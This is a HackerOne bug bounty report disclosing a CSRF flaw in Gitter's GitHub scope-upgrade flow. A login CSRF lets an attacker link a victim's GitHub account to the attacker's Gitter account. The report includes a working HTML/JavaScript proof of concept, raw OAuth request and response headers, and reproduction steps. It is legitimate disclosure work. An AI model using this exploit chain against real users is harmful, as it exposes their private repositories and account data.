CSRF - Disclose GitHub private (repositories, issues, pulls, etc..) - via /login/upgrade?scopes=repo
HackerOne report #471259 by yipman on 2018-12-22, assigned to dappelt
Summary:
I have found a CSRF that allows me to connect my account (attacker account) with the victim's GitHub account, which allows the attacker to see all private GitHub (repositories, issues, pulls, etc.) and allows him to do everything he can do using gitter.im.
Description:
I found this URL: https://gitlab.com/gitlab-org/gitter/webapp/blob/develop/docs/oauth-scopes.md#private-repositories and I saw that this URL (https://gitter.im/login/upgrade?scopes=repo) can be used to connect with GitHub; then, after connecting, I can access private (repositories, issues, pulls, etc.). So I searched for how I can connect the victim's GitHub account with my Gitter account, and I found:
- This URL: https://gitter.im/login/upgrade?scopes=repo, without a token, so I can use it as CSRF!
- To link my account with the victim's GitHub account, my Gitter account should be logged in in the victim's browser, because in the victim's browser his GitHub account is already logged in and already auto-connects with the Gitter app!
- So I searched for a way to log in my account in the victim's browser, and I found I can use login via GitLab as a Login CSRF; you can see that in the POC and the video 😊
- Then I can create JavaScript+HTML to do all these things at the same time!
NOTE: The victim should already be connected with GitHub before, and I think most users in Gitter already use GitHub!
POC:
Index.html
<html>
<head>
<script type="text/javascript">
// Login CSRF: completes the attacker's GitLab OAuth callback in the victim's browser,
// so the victim's Gitter session becomes the attacker's Gitter account
window.open("https://gitter.im/login/gitlab/callback?code=your_code");
</script>
<script>
function myFunction() {
  // after 3 seconds, go to the scope upgrade: the GitHub account already signed in
  // in the browser gets connected to the Gitter account that is now logged in
  setTimeout(function(){ window.location.href = "https://gitter.im/login/upgrade?scopes=repo"; }, 3000);
}
window.onload = myFunction;
</script>
</head>
<body></body>
</html>
NOTE: Don't forget to change this in the code:
window.open("https://gitter.im/login/gitlab/callback?code=your_code");
to your code; you can get your code via:
Or if you want to see all the requests:
Request Headers:
GET /oauth/authorize?response_type=code&redirect_uri=https%3A%2F%2Fgitter.im%2Flogin%2Fgitlab%2Fcallback&scope=read_user%20api&client_id=e2803ae4f09cebdcff56813a0bfbb1a4f0b187355b509eb6d5367a07ad523762 HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://gitter.im/
Connection: close
Cookie: your_cookies
Upgrade-Insecure-Requests: 1
Response Headers:
HTTP/1.1 302 Found
Server: nginx
Date: Sat, 22 Dec 2018 17:04:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 175
Connection: close
Cache-Control: no-cache
Location: https://gitter.im/login/gitlab/callback?code=xxx
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Request-Id: DQ4zsvAVyQ3
X-Runtime: 0.094901
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none'; worker-src https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net https://gitlab.com blob:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://apis.google.com; style-src 'self' 'unsafe-inline' https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net; img-src * data: blob:; frame-src 'self' https://www.google.com/recaptcha/ https://content.googleapis.com https://content-compute.googleapis.com https://content-cloudbilling.googleapis.com https://content-cloudresourcemanager.googleapis.com https://*.codesandbox.io; frame-ancestors 'self'; connect-src 'self' https://assets.gitlab-static.net https://gl-canary.global.ssl.fastly.net wss://gitlab.com https://sentry.gitlab.net https://customers.gitlab.com https://snowplow.trx.gitlab.net
<html><body>You are being <a href="https://gitter.im/login/gitlab/callback?code=xxx">redirected</a>.</body></html>
Steps To Reproduce:
In these steps, I tell you how you can reproduce this exploit, so I also tell you what the victim already did before!
- As attacker: Create a new account in gitter.im via GitLab (Sign in with GitLab).
- As victim: Create a new account in gitter.im and create a GitHub account (if you don't have one!).
- As victim: Log in to your account, then connect to your GitHub account via this URL: https://gitter.im/login/upgrade?scopes=repo
- As attacker: Open your Burp Suite or any other proxy tool, and open another browser, then log in to your attacker GitLab account, then go to gitter.im and open your proxy as in the video (intercept is on), then click on (Sign in with GitLab); like in the video, take the response that has the GitLab OAuth code, like the Response Headers in the POC, and put this URL or change the code value in the POC HTML file, like in the video!
- As attacker: Just open the URL or the file in the victim's browser, and you can see your Gitter account logged in and the victim's GitHub account connected with your Gitter account; you can log in to your account as attacker from anywhere and you can see the victim's (repositories, issues, pulls, etc.) 😇
Supporting Material/References:
Screencast_12-22-2018_04_03_35_PM.webm
NOTE: I am sorry if my English is bad or the report is not clear :(
🙂 😇
If you encounter any problem or do not understand anything, tell me. Please do not judge anything if you do not understand it before asking me. Thanks
Impact
- Discloses the private GitHub account!
- Can access private (repositories, issues, pulls, etc.)